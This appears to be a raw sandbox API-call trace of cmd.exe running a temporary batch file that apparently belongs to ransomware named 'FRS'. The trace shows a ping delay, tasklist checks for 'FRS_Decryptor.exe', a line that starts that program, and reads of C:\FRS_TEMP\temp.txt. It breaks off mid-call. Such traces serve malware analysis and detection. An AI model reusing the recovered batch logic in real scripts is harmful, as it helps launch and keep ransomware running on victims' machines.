[0086.361] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0086.361] GetLastError () returned 0x2 [0086.361] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59e70 [0086.361] FindClose (in: hFindFile=0xd59e70 | out: hFindFile=0xd59e70) returned 1 [0086.361] GetFileType (hFile=0x28) returned 0x2 [0086.361] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0086.361] _dup (_FileHandle=1) returned 3 [0086.361] _close (_FileHandle=1) returned 0 [0086.361] _wcsicmp (_String1="nul", _String2="con") returned 11 [0086.361] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0086.361] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0086.361] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0086.361] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0086.361] SetErrorMode (uMode=0x0) returned 0x0 [0086.361] SetErrorMode (uMode=0x1) returned 0x0 [0086.361] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0086.361] SetErrorMode (uMode=0x0) returned 0x1 [0086.362] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0086.362] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0086.362] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0086.362] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0086.362] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0086.362] GetLastError () returned 0x2 [0086.362] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0086.362] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a070 [0086.362] FindClose (in: hFindFile=0xd5a070 | out: hFindFile=0xd5a070) returned 1 [0086.362] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0086.362] GetLastError () returned 0x2 [0086.362] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59bb0 [0086.362] FindClose (in: hFindFile=0xd59bb0 | out: hFindFile=0xd59bb0) returned 1 [0086.362] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0086.362] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0086.362] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0086.362] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0086.363] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0086.363] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0086.363] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x260, hThread=0x2a0, dwProcessId=0x9c0, dwThreadId=0x9b4)) returned 1 [0086.366] CloseHandle (hObject=0x2a0) returned 1 [0086.366] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0086.366] GetEnvironmentStringsW () returned 0xd2c668* [0086.366] FreeEnvironmentStringsA (penv="=") returned 1 [0086.366] WaitForSingleObject (hHandle=0x260, dwMilliseconds=0xffffffff) returned 0x0 [0088.433] GetExitCodeProcess (in: hProcess=0x260, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0088.434] CloseHandle (hObject=0x260) returned 1 [0088.434] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0088.434] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0088.434] GetEnvironmentStringsW () returned 0xd30508* [0088.434] FreeEnvironmentStringsA (penv="=") returned 1 [0088.434] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0088.434] GetEnvironmentStringsW () returned 0xd2c668* [0088.434] FreeEnvironmentStringsA (penv="=") returned 1 [0088.434] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0088.434] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0088.434] _close (_FileHandle=3) returned 0 [0088.434] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.434] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0088.435] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.435] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0088.435] _get_osfhandle (_FileHandle=0) returned 0x24 [0088.435] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0088.435] SetConsoleInputExeNameW () returned 0x1 [0088.435] GetConsoleOutputCP () returned 0x1b5 [0088.435] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0088.435] SetThreadUILanguage (LangId=0x0) returned 0x409 [0088.435] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x254 [0088.435] _open_osfhandle (_OSFileHandle=0x254, _Flags=8) returned 3 [0088.435] _get_osfhandle (_FileHandle=3) returned 0x254 [0088.435] SetFilePointer (in: hFile=0x254, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0088.435] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0088.435] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0088.436] SetFilePointer (in: hFile=0x254, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0088.436] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0088.436] GetFileType (hFile=0x254) returned 0x1 [0088.436] _get_osfhandle (_FileHandle=3) returned 0x254 [0088.436] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0088.436] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0088.436] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0088.436] SetFilePointer (in: hFile=0x254, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0088.436] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0088.436] GetFileType (hFile=0x254) returned 0x1 [0088.436] _get_osfhandle (_FileHandle=3) returned 0x254 [0088.436] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0088.436] _tell (_FileHandle=3) returned 2627 [0088.436] _close (_FileHandle=3) returned 0 [0088.436] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0088.436] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0088.436] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0088.436] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0088.436] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0088.441] feof (_File=0x76ea4c68) returned 0 [0088.441] ferror (_File=0x76ea4c68) returned 0 [0088.441] fgets (in: _Buf=0xd82088, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0088.888] feof (_File=0x76ea4c68) returned 0 [0088.888] ferror (_File=0x76ea4c68) returned 0 [0088.888] fgets (in: _Buf=0xd865c6, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0088.925] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0088.925] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43306, cbMultiByte=78, lpWideCharStr=0xd432b8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0088.925] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0088.925] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0088.926] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x34c [0088.926] _open_osfhandle (_OSFileHandle=0x34c, _Flags=8) returned 3 [0088.926] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.926] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0088.926] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.926] GetFileSize (in: hFile=0x34c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0088.926] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0088.926] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.926] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0088.926] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.926] GetFileType (hFile=0x34c) returned 0x1 [0088.926] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0088.926] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0088.926] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0088.927] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0088.927] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0088.927] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.927] GetFileType (hFile=0x34c) returned 0x1 [0088.927] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0088.927] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0088.927] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0088.927] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0088.927] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.927] GetFileType (hFile=0x34c) returned 0x1 [0088.927] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0088.927] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0088.927] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.927] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.927] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.927] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.927] GetFileType (hFile=0x34c) returned 0x1 [0088.927] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.927] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.927] SetFilePointer (in: hFile=0x34c, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0088.927] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0088.927] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0088.927] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.927] GetFileType (hFile=0x34c) returned 0x1 [0088.927] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0088.927] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.927] SetFilePointer (in: hFile=0x34c, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0088.927] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0088.927] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0088.927] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.927] GetFileType (hFile=0x34c) returned 0x1 [0088.928] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0088.928] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.928] SetFilePointer (in: hFile=0x34c, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0088.928] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0088.928] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0088.928] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.928] GetFileType (hFile=0x34c) returned 0x1 [0088.928] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0088.928] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.928] SetFilePointer (in: hFile=0x34c, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0088.928] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0088.928] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0088.928] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.928] GetFileType (hFile=0x34c) returned 0x1 [0088.928] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0088.928] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.928] SetFilePointer (in: hFile=0x34c, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0088.928] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0088.928] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0088.928] _get_osfhandle (_FileHandle=3) returned 0x34c [0088.928] GetFileType (hFile=0x34c) returned 0x1 [0088.928] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0088.928] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0088.928] SetFilePointer (in: hFile=0x34c, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 